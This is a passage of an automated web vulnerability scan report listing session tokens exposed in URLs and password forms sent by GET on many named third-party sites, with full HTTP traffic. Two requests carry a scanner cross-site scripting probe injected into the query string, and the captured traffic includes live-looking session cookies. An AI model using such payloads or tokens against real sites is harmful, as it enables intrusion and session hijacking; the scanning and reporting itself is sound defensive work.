
Severity:   Medium
Confidence:   Firm
Host:   http://173.46.7.45
Path:   /SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand?callback=jsonp1303758910799&accountDataBaseID=1&websiteDataBaseID=13&browserID=5dd345ac-ed22-4b2b-853e-dbfa145a8ba3&sessionID=9e065146-0b55-4772-8638-739611076c8a HTTP/1.1
Host: 173.46.7.45
Proxy-Connection: keep-alive
Referer: http://hostpapasupport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SmartMaxUser=5dd345ac-ed22-4b2b-853e-dbfa145a8ba3; SmartMaxSession=9e065146-0b55-4772-8638-739611076c8a

Response

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 19:14:52 GMT
Content-Length: 72

jsonp1303758910799( {"GetVisitorAgentSessionMonitorCommandResult":10} );
13.3. http://demo.kayako.com/supportsuite/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://demo.kayako.com
Path:   /supportsuite/visitor/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /supportsuite/visitor/index.php?_m=livesupport&_a=updatefootprint&time=1303758916285&rand=17&url=http%3A%2F%2Fdemo.kayako.com%2Fsupportsuite%2Findex.php&isfirsttime=0&sessionid=px754zjffzzcg0b8y1ec1131gdlkt1uu&referrer=&resolution=1920x1156&colordepth=16&platform=Win32&appversion=5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US)%20AppleWebKit%2F534.16%20(KHTML%2C%20like%20Gecko)%20Chrome%2F10.0.648.205%20Safari%2F534.16&appname=Netscape&browsercode=SF&browserversion=5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US)%20AppleWebKit%2F534.16%20(KHTML%2C%20like%20Gecko)%20Chrome%2F10.0.648.205%20Safari%2F534.16&browsername=Safari&operatingsys=Windows&pagetitle=Kayako%20Infotech%20Ltd.%20-%20Kayako%20SupportSuite%20Help%20Desk%20Software&country=&countrycode=&hasnotes=0&campaignid=&campaigntitle= HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
Referer: http://demo.kayako.com/supportsuite/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892; SWIFT_sessionid40=cdydhwsfse8y4xjyex80hyc0xlrhdz3j; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=px754zjffzzcg0b8y1ec1131gdlkt1uu; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:15:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 19:15:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 44
Connection: close
Content-Type: image/gif

GIF89a.............!.......,............o..;
13.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://kronos.tt.omtrdc.net
Path:   /m2/kronos/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();
13.5. http://mbox5.offermatica.com/m2/netsuite/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1278
Date: Mon, 25 Apr 2011 14:40:50 GMT
Server: Test & Target

var mboxCurrent=mboxFactoryDefault.get('overall_conversion_tracking-mbox',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-o
...[SNIP]...
13.6. http://mbox9e.offermatica.com/m2/eset/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");
13.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

13.8. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

13.9. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /visitor/index.php HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=chatstartcontentframe&sessionid=&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 74

departmentid=3&fullname=&email=&_m=livesupport&_a=startformchat&sessionid=

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:25 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 2070

<html>
<head>
<title>Trust Guard -
...[SNIP]...
<frameset rows="70,*,48,29" cols="*" framespacing="0" frameborder="NO" border="0" onUnload="javascript:endChat();">
<frame src="https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=chatheaderframe&chatsessionid=dnn1t75plf15k938su1i2cn7f8lylja3&sessionid=&clientfullname=&randno=ymqzivnr0axqe9xdocatwbeo3a6lwe5y" name="headerframe" scrolling="NO" noresize>
<frame src="https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=chatstartedcontentframe&chatsessionid=dnn1t75plf15k938su1i2cn7f8lylja3&sessionid=&randno=ymqzivnr0axqe9xdocatwbeo3a6lwe5y" name="contentframe" scrolling="AUTO" border="0" noresize>
<frame src="https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=clientchatpostframe&chatsessionid=dnn1t75plf15k938su1i2cn7f8lylja3&sessionid=&randno=ymqzivnr0axqe9xdocatwbeo3a6lwe5y" name="postframe" scrolling="NO" noresize>
<frame src="https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=chatfooterframe&chatsessionid=dnn1t75plf15k938su1i2cn7f8lylja3&sessionid=&randno=ymqzivnr0axqe9xdocatwbeo3a6lwe5y" name="footerframe" scrolling="NO" noresize>
</frameset>
...[SNIP]...
13.10. http://www.removeyourname.com/js/myEdgeProFormWidget.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.removeyourname.com
Path:   /js/myEdgeProFormWidget.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /js/myEdgeProFormWidget.js HTTP/1.1
Host: www.removeyourname.com
Proxy-Connection: keep-alive
Referer: http://www.removeyourname.com/company/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=136832947.1303747413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=136832947.1526791206.1303747413.1303747413.1303747413.1; __utmc=136832947; __utmb=136832947.6.10.1303747413

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:26:57 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 00:44:49 GMT
ETag: "a478e-19ab-496ef8b85e240"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 6571

function MyEdgeProFormWidget(){
PopupWidgetBase.call(this);
this.validator;
}

MyEdgeProFormWidget.prototype = new PopupWidgetBase();

MyEdgeProFormWidget.prototype.constructor = MyEdgeProForm
...[SNIP]...
<noscript>" +
'<img src="https://27.xg4ken.com/media/redir.php?track=1&token=e074ccda-9395-4985-bd83-19577d8ab92a&type=conv&val=0.0&orderId=&promoCode=&valueCurrency=USD" width="1" height="1">' +
'</noscript>
...[SNIP]...
13.11. http://www.supportskins.com/support/visitor/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.supportskins.com
Path:   /support/visitor/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /support/visitor/index.php?_m=livesupport&_a=updatefootprint&time=1303758928331&rand=29&url=http%3A%2F%2Fwww.supportskins.com%2F&isfirsttime=0&sessionid=jkh1u654s174y67mflyld69pqqrqm6bq&referrer=&resolution=1920x1156&colordepth=16&platform=Win32&appversion=5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US)%20AppleWebKit%2F534.16%20(KHTML%2C%20like%20Gecko)%20Chrome%2F10.0.648.205%20Safari%2F534.16&appname=Netscape&browsercode=SF&browserversion=5.0%20(Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US)%20AppleWebKit%2F534.16%20(KHTML%2C%20like%20Gecko)%20Chrome%2F10.0.648.205%20Safari%2F534.16&browsername=Safari&operatingsys=Windows&pagetitle=Kayako%20Skins%2C%20SupportSuite%20Skins%2C%20eSupport%20Skins%2C%20LiveResponse%20Skins%20-%20SupportSkins.com&country=&countrycode=&hasnotes=0&campaignid=&campaigntitle= HTTP/1.1
Host: www.supportskins.com
Proxy-Connection: keep-alive
Referer: http://www.supportskins.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid80=jkh1u654s174y67mflyld69pqqrqm6bq; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; __utmz=127474959.1303758906.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=127474959.1607895902.1303758906.1303758906.1303758906.1; __utmc=127474959; __utmb=127474959.1.10.1303758906

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 19:15:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 496
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /support/visitor/index.php
on this
...[SNIP]...
14. Password field submitted using GET method  previous  next
There are 5 instances of this issue:

14.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...
14.2. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
14.3. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
14.4. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
14.5. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
